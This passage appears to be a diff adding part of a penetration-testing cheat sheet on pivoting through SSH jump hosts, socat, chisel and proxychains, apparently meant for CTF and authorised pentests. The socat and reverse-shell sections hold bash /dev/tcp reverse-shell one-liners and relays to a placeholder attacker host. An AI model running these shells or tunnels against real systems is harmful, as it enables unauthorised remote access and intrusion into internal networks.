# SSH through two pivot hosts:
|
|
137
|
+
ssh -J user@pivot1 user@internal-host
|
|
138
|
+
ssh -J user@pivot1,user@pivot2 user@deep-internal
|
|
139
|
+
|
|
140
|
+
---
|
|
141
|
+
|
|
142
|
+
## socat — Port Forwarding (when SSH not available)
|
|
143
|
+
|
|
144
|
+
# Forward all traffic on port 8080 to internal host:
|
|
145
|
+
socat TCP-LISTEN:8080,fork TCP:10.10.10.5:80
|
|
146
|
+
|
|
147
|
+
# Relay reverse shell through pivot:
|
|
148
|
+
# On pivot:
|
|
149
|
+
socat TCP-LISTEN:4444,fork TCP:<attacker>:4444
|
|
150
|
+
# On target:
|
|
151
|
+
bash -i >& /dev/tcp/<pivot_ip>/4444 0>&1
|
|
152
|
+
|
|
153
|
+
---
|
|
154
|
+
|
|
155
|
+
## Reverse Shell Through Pivot
|
|
156
|
+
|
|
157
|
+
# If target can only reach pivot (not attacker directly):
|
|
158
|
+
# Step 1: Setup socat relay on pivot:
|
|
159
|
+
socat TCP-LISTEN:4444,fork TCP:<attacker>:5555 &
|
|
160
|
+
|
|
161
|
+
# Step 2: Setup listener on attacker:
|
|
162
|
+
nc -lvnp 5555
|
|
163
|
+
|
|
164
|
+
# Step 3: Execute reverse shell on deep target pointing to pivot:
|
|
165
|
+
bash -i >& /dev/tcp/<pivot_ip>/4444 0>&1
|
|
166
|
+
|
|
167
|
+
---
|
|
168
|
+
|
|
169
|
+
## Double Pivot (Chaining)
|
|
170
|
+
|
|
171
|
+
# Reach network behind second pivot:
|
|
172
|
+
# Network: Kali → Pivot1 → Pivot2 → Internal
|
|
173
|
+
|
|
174
|
+
# On Kali: start chisel server
|
|
175
|
+
/home/pentester/tools/chisel server --reverse -p 8001
|
|
176
|
+
|
|
177
|
+
# On Pivot1: connect to Kali + create second server for Pivot2
|
|
178
|
+
./chisel client <kali>:8001 R:8002:127.0.0.1:8002 &
|
|
179
|
+
./chisel server --reverse -p 8002 &
|
|
180
|
+
|
|
181
|
+
# On Pivot2: connect back through Pivot1:
|
|
182
|
+
./chisel client <pivot1_ip>:8002 R:1080:socks
|
|
183
|
+
|
|
184
|
+
# Kali proxychains → SOCKS on 127.0.0.1:1080 → Pivot2's network
|
|
185
|
+
|
|
186
|
+
---
|
|
187
|
+
|
|
188
|
+
## Pro Tips
|
|
189
|
+
|
|
190
|
+
1. **chisel** = easiest setup, works on any OS, single binary, no root needed
|
|
191
|
+
2. **ligolo-ng** = best for extended engagements — full layer-3, nmap SYN works, no proxychains
|
|
192
|
+
3. `proxychains nmap -sT` (TCP connect, not SYN) — SYN doesn't work through SOCKS
|
|
193
|
+
4. Always bring chisel binaries for both Linux AND Windows — cross-platform agent
|
|
194
|
+
5. SSH SOCKS (`-D`) = simplest if SSH access exists — no additional tools
|
|
195
|
+
6. socat relay = best emergency option, available on most Linux systems by default
|
|
196
|
+
|
|
197
|
+
## Summary
|
|
198
|
+
|
|
199
|
+
Pivoting toolkit priority:
|
|
200
|
+
1. SSH `-D 1080` → proxychains (if SSH access, easiest)
|
|
201
|
+
2. Chisel server (Kali) + client (pivot) → SOCKS5 → proxychains (most common CTF/pentest)
|
|
202
|
+
3. ligolo-ng → full layer-3 interface → no proxychains needed (best for extended pentest)
|
|
203
|
+
4. socat → emergency port forward when no other tool available
|
|
204
|
+
|
|
205
|
+
Configure `/etc/proxychains4.conf` once → `proxychains <any_tool>` reaches internal network.
|